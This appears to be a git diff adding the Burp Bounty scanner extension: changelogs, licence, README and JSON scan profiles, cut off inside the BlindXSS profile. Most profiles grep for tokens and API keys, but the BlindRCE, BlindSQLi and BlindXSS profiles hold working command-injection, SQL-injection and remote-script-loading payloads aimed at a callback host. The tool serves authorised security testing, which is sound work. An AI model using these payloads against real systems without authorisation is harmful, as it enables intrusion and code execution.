diff --git a/Changelog_3.0.4beta.md b/Changelog_3.0.4beta.md
new file mode 100755
index 0000000..187adf3
--- /dev/null
+++ b/Changelog_3.0.4beta.md
@@ -0,0 +1,63 @@
+# Improvements Burp Bounty 3.0.4beta:
+
+### "Path discovery" feature add new insertion points
+
+New insertion points are added to the requests (To discover hidden files and directories), when you check the "Path Discovery" option in "Payload Options" section. For example in the request:
+
+GET /dir1/dir2/file.php?param=value HTTP/1.1
+
+Generate three new Insertion points:
+
+1- GET {HERE} HTTP/1.1
+2- GET /dir1{HERE} HTTP/1.1
+3- GET /dir1/dir2{HERE} HTTP/1.1
+
+Then, if you put in payload /.git/HEAD, the three new request are:
+
+1- GET /.git/HEAD HTTP/1.1
+2- GET /dir1/.git/HEAD HTTP/1.1
+3- GET /dir1/dir2/.git/HEAD HTTP/1.1
+
+without param=value.
+
+Another example, in request:
+
+GET / HTTP/1.1
+
+Generate one new insertion point:
+
+1- GET {HERE} HTTP/1.1
+
+Then, if you put in payload "/assets../static/app.js", the one new request are:
+
+1- GET /assets../static/app.js HTTP/1.1
+
+
+
+
+
+For discover some useful files or directories:
+
+
+
+
+### New tags for extract matches and better issue documentation
+
+All the matches of the requests and responses are highlighted. You can extract the matches of the requests and responses to the issuedetail, through the tags for the payloads and for the greps. It's useful for example, for extract endpoint from regex through passive scanner:
+
+
+
+
+
+
+### Variations/Invariations match type feature
+You can add issues by checking Variations/Invariations between the base response, and each payoad response. I have 31 different attributes for this(the names of the attributes are quite descriptive):
+
+
+
+
+### Algorithm optimization
+Improved some algorithms for better performance.
+
+### New profiles added
+Various profiles was added in profiles directory
diff --git a/Changelog_3.0.5beta.md b/Changelog_3.0.5beta.md
new file mode 100755
index 0000000..fcfe94e
--- /dev/null
+++ b/Changelog_3.0.5beta.md
@@ -0,0 +1,12 @@
+# Improvements Burp Bounty 3.0.5beta:
+
+### Choose insertion points type for one profile
+For better optimization, now you can choose the insertion point type for one profile. For example, for discover new application paths, you only will choose the "Path discover" insertion point type, avoiding other innecesaries requests.
+
+
+
+
+
+### Fixed error with redirections
+
+In some cases the regex for redirection can cause 100% of the CPU usage.
diff --git a/LICENCE b/LICENCE
new file mode 100755
index 0000000..2293e1a
--- /dev/null
+++ b/LICENCE
@@ -0,0 +1,202 @@
+
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright 2018 Eduardo Garcia Melia
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..4f225a0
--- /dev/null
+++ b/README.md
@@ -0,0 +1,135 @@
+
+[](https://github.com/wagiro/BurpBounty/releases)
+[](https://github.com/wagiro/BurpBounty/issues)
+[](https://github.com/wagiro/BurpBounty/)
+[](https://github.com/wagiro/BurpBounty/)
+[](https://twitter.com/intent/follow?screen_name=bountyburp)
+
+
+# Burp Bounty - Scan Check Builder (BApp Store)
+
+Download releases:
+
+* https://github.com/wagiro/BurpBounty/releases/
+
+
+This Burp Suite extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.
+
+
+
+## Usage
+
+* Go to [Usage](https://github.com/wagiro/BurpBounty/wiki/usage) section.
+
+## Profiles
+
+* Profiles from [egarme](https://twitter.com/egarme) in [Github](https://github.com/wagiro/BurpBounty/tree/master/profiles/)
+
+* Profiles from [Xer0dayz](https://twitter.com/xer0dayz) in their [Github](https://github.com/1N3/IntruderPayloads/tree/master/BurpBountyPayloads)
+
+* Profiles from [Gocha](https://twitter.com/GochaOqradze) in their [Github](https://github.com/ghsec/BBProfiles)
+
+* Profiles from [Sy3Omda](https://twitter.com/Sy3Omda) in their [Github](https://github.com/Sy3Omda/burp-bounty)
+
+
+### For example videos please visit our youtube channel:
+
+* [YouTube](https://www.youtube.com/channel/UCSq4R2o9_nGIMHWZ4H98GkQ/videos)
+
+
+
+
+**Blind RCE with BurpBounty using Burp Collaborator
**
+
+[](https://www.youtube.com/watch?v=kcyUueb56aM)
+
+
+**Extract endpoints with BurpBounty
**
+
+[](https://www.youtube.com/watch?v=ELftJwkY_e0)
+
+
+
+
+
+## Changelog
+**3.1.0 20200407**
+* Fixed 12 issues from github
+* Better performance of the match algorithm
+* "Path discovery" option has been improved
+* Profiles adapted to the new version
+
+
+**3.0.6beta 20190819**
+* Fixed error with tab
+* Fixed error with status code
+
+**3.0.5beta 20190612**
+* Choose insertion points type for one profile
+* Fixed error with redirections
+
+**3.0.4beta 20190217**
+* "Path discovery" feature add new insertion points
+* New tags for extract matches and better issue documentation
+* Variations/Invariations match type feature
+* Algorithm optimization
+* New profiles added
+
+
+**3.0.3beta 20190206**
+* Add Match and Replace feature
+* Delete Collaborator button (now start automatically)
+* Improve Collaborator Thread
+* Some minor improvements
+
+**3.0.2beta 20181217**
+* Fixed error with comma separated
+
+**3.0.1beta 20181207**
+* Fixed error with timeout
+
+
+**3.0.0beta 20181204**
+* New multi-tab look and feel
+* Passive scanner for requests
+* Content-length comparer (for blindSQLi, etc.)
+* Tags system for organize your profiles
+* New BurpCollaborator Interaction
+* New Profile Manager
+* Deleted “not in cookie” functionality
+* Some minor improvements
+
+**2.3 20181029**
+* Improved profile manager
+* Fixed some minor problems
+
+**2.2 20181026**
+* Fixed some minor problems
+
+**2.1 20181024**
+* Replace strings in payloads
+* Field to put profile authors information
+* Timeout option for blind vulns
+* Multiple lines bb json file
+
+
+**2.0 20181020**
+* Add the burpcollaborator support
+* Follow redirects and how many to follow
+* Payload append or replace
+* Space encoding choose
+* Response codes to avoid
+* Content type to avoid
+
+
+**1.2 20180607**
+ - Solved bug with payload space
+ - Add "Exclude HTTP Headers" feature
+ - Add "Only in HTTP Headers" feature
+
+**1.1 20180606**
+ - Some improvements for integrate with the BApps Store
+
+**1.0 20180531**
+ - First public release
+
diff --git a/images/1.png b/images/1.png
new file mode 100755
index 0000000..4c011fb
Binary files /dev/null and b/images/1.png differ
diff --git a/images/10.png b/images/10.png
new file mode 100755
index 0000000..51a2805
Binary files /dev/null and b/images/10.png differ
diff --git a/images/11.png b/images/11.png
new file mode 100755
index 0000000..799df2d
Binary files /dev/null and b/images/11.png differ
diff --git a/images/12.png b/images/12.png
new file mode 100755
index 0000000..0cb7d37
Binary files /dev/null and b/images/12.png differ
diff --git a/images/13.png b/images/13.png
new file mode 100755
index 0000000..6ffcdd5
Binary files /dev/null and b/images/13.png differ
diff --git a/images/14.png b/images/14.png
new file mode 100755
index 0000000..02a80ca
Binary files /dev/null and b/images/14.png differ
diff --git a/images/2.png b/images/2.png
new file mode 100755
index 0000000..e65301b
Binary files /dev/null and b/images/2.png differ
diff --git a/images/3.png b/images/3.png
new file mode 100755
index 0000000..2e2e4d9
Binary files /dev/null and b/images/3.png differ
diff --git a/images/4.png b/images/4.png
new file mode 100755
index 0000000..4f8335f
Binary files /dev/null and b/images/4.png differ
diff --git a/images/5.png b/images/5.png
new file mode 100755
index 0000000..882e086
Binary files /dev/null and b/images/5.png differ
diff --git a/images/6.png b/images/6.png
new file mode 100755
index 0000000..5c9b5d6
Binary files /dev/null and b/images/6.png differ
diff --git a/images/7.png b/images/7.png
new file mode 100755
index 0000000..76e321a
Binary files /dev/null and b/images/7.png differ
diff --git a/images/8.png b/images/8.png
new file mode 100755
index 0000000..5b8c865
Binary files /dev/null and b/images/8.png differ
diff --git a/images/9.png b/images/9.png
new file mode 100755
index 0000000..4d155d0
Binary files /dev/null and b/images/9.png differ
diff --git a/images/BurpBounty.jpg b/images/BurpBounty.jpg
new file mode 100755
index 0000000..580fd91
Binary files /dev/null and b/images/BurpBounty.jpg differ
diff --git a/images/BurpBounty_v3.0.3beta.png b/images/BurpBounty_v3.0.3beta.png
new file mode 100755
index 0000000..934518e
Binary files /dev/null and b/images/BurpBounty_v3.0.3beta.png differ
diff --git a/images/Headers.png b/images/Headers.png
new file mode 100755
index 0000000..2290d8a
Binary files /dev/null and b/images/Headers.png differ
diff --git a/images/MatchType.png b/images/MatchType.png
new file mode 100755
index 0000000..bc1387e
Binary files /dev/null and b/images/MatchType.png differ
diff --git a/images/Payloadoptions.png b/images/Payloadoptions.png
new file mode 100755
index 0000000..e85683f
Binary files /dev/null and b/images/Payloadoptions.png differ
diff --git a/images/insertionpointtype.png b/images/insertionpointtype.png
new file mode 100755
index 0000000..e9392d8
Binary files /dev/null and b/images/insertionpointtype.png differ
diff --git a/images/path.png b/images/path.png
new file mode 100755
index 0000000..e3eec5d
Binary files /dev/null and b/images/path.png differ
diff --git a/images/tagsfeature.png b/images/tagsfeature.png
new file mode 100755
index 0000000..ccf3aea
Binary files /dev/null and b/images/tagsfeature.png differ
diff --git a/images/variations.png b/images/variations.png
new file mode 100755
index 0000000..ae769a2
Binary files /dev/null and b/images/variations.png differ
diff --git a/profiles/AccessToken.bb b/profiles/AccessToken.bb
new file mode 100755
index 0000000..9ae3444
--- /dev/null
+++ b/profiles/AccessToken.bb
@@ -0,0 +1 @@
+[{"Name":"AccessToken","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["access_token"],"Tags":["JWT"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"AccessToken","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Access Token Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/AmazonAWS.bb b/profiles/AmazonAWS.bb
new file mode 100755
index 0000000..b0a8c1b
--- /dev/null
+++ b/profiles/AmazonAWS.bb
@@ -0,0 +1 @@
+[{"Name":"AmazonAWS","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["s3..*amazonaws.com"],"Tags":["regex"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"AmazonAWS","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Amazon AWS found: \u003cbr\u003e\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/AmazonAWSRequest.bb b/profiles/AmazonAWSRequest.bb
new file mode 100755
index 0000000..325205d
--- /dev/null
+++ b/profiles/AmazonAWSRequest.bb
@@ -0,0 +1 @@
+[{"Name":"AmazonAWSRequest","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["s3..*amazonaws.com"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"AmazonAWS","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Amazon AWS found: \u003cbr\u003e\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/ApiKeyRequest.bb b/profiles/ApiKeyRequest.bb
new file mode 100755
index 0000000..25dcdb2
--- /dev/null
+++ b/profiles/ApiKeyRequest.bb
@@ -0,0 +1 @@
+[{"Name":"ApiKeyRequest","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["api_key","api-key","api key","apikey"],"Tags":["API"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ApiKeyRequest","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Api Key found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/ApiKeyResponse.bb b/profiles/ApiKeyResponse.bb
new file mode 100755
index 0000000..85549e4
--- /dev/null
+++ b/profiles/ApiKeyResponse.bb
@@ -0,0 +1 @@
+[{"Name":"ApiKeyResponse","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["api_key","api-key","api key","apikey"],"Tags":["API"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ApiKeyResponse","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Api Key found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/ApiPath.bb b/profiles/ApiPath.bb
new file mode 100755
index 0000000..4cb10f1
--- /dev/null
+++ b/profiles/ApiPath.bb
@@ -0,0 +1 @@
+[{"Name":"ApiPath","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["/api/","internal_api"],"Tags":["API"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ApiPath","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Api Path found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/AuthorizationBearerToken.bb b/profiles/AuthorizationBearerToken.bb
new file mode 100755
index 0000000..4950ca8
--- /dev/null
+++ b/profiles/AuthorizationBearerToken.bb
@@ -0,0 +1 @@
+[{"Name":"AuthorizationBearerToken","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Authorization: Bearer"],"Tags":["JWT"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"AuthorizationBearerToken","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Authorization Bearer Token Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/BlindRCE.bb b/profiles/BlindRCE.bb
new file mode 100755
index 0000000..3388d56
--- /dev/null
+++ b/profiles/BlindRCE.bb
@@ -0,0 +1 @@
+[{"Name":"BlindRCE","Active":true,"Scanner":1,"Author":"@egarme","Payloads":[" || ping -c 2 {BC}"," | ping -c 2 {BC}","; ping -c 2 {BC}"," \u0026\u0026 ping -c 2 {BC}"," \u0026 ping -c 2 {BC}"],"Encoder":[],"UrlEncode":true,"CharsToUrlEncode":"|;\u0026","Grep":[],"Tags":["Collaborator","RCE"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindRCE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"RCE with el payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/BlindSQLi-ContentLength.bb b/profiles/BlindSQLi-ContentLength.bb
new file mode 100755
index 0000000..f5a9335
--- /dev/null
+++ b/profiles/BlindSQLi-ContentLength.bb
@@ -0,0 +1 @@
+[{"Name":"BlindSQLi-ContentLength","Active":true,"Scanner":1,"Author":"@egarme","Payloads":[" or 1\u003d2"," or 1\u003d2-- "," or 1\u003d2#"," or 1\u003d2/*"," and 1\u003d2--"," and 1\u003d2"," and 1\u003d2#"," and 1\u003d2/*","\u0027 or \u00271\u0027\u003d\u00272","\u0027 and \u00271\u0027\u003d\u00272"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["SQLi"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"3000","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":6,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-ContentLength","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Blind SQL injection found with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/BlindSQLi-TimeBased.bb b/profiles/BlindSQLi-TimeBased.bb
new file mode 100755
index 0000000..8c227b1
--- /dev/null
+++ b/profiles/BlindSQLi-TimeBased.bb
@@ -0,0 +1 @@
+[{"Name":"BlindSQLi-TimeBased","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027 and sleep 12--","\u0027 and sleep 12","\u0027 and sleep 12 and \u00271\u0027\u003d\u00271","\u0027 and sleep(12) and \u00271\u0027\u003d\u00271","\u0027 and sleep(12)--","\u0027 and sleep(12)",";sleep(12)--","\u0027 SELECT BENCHMARK(1200000,MD5(\u0027A\u0027));","\u0027 SELECT SLEEP(12); #","\u0027 WAITFOR DELAY \u00270:0:12\u0027--","\u0027 WAITFOR DELAY \u00270:0:12\u0027","\u0027 SELECT pg_sleep(12);"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["SQLi"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"8","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":5,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-TimeBased","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/BlindXSS.bb b/profiles/BlindXSS.bb
new file mode 100755
index 0000000..801d174
--- /dev/null
+++ b/profiles/BlindXSS.bb
@@ -0,0 +1 @@
+[{"Name":"BlindXSS","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003cscript\u003e$.getScript(\"//{BC}\")\u003c/script\u003e","javascript:eval(\u0027var a\u003ddocument.createElement(\\\u0027script\\\u0027);a.src\u003d\\\u0027https://{BC}\\\u0027;document.body.appendChild(a)\u0027)","\u003cscript\u003efunction b(){eval(this.responseText)};a\u003dnew XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//{BC}\");a.send();\u003c/script\u003e","\"\u003e\u003cscript src\u003dhttp://{BC}\u003e\u003c/script\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XSS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"BlindXSS","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Blind XSS found with payloads: \u003cbr\u003e 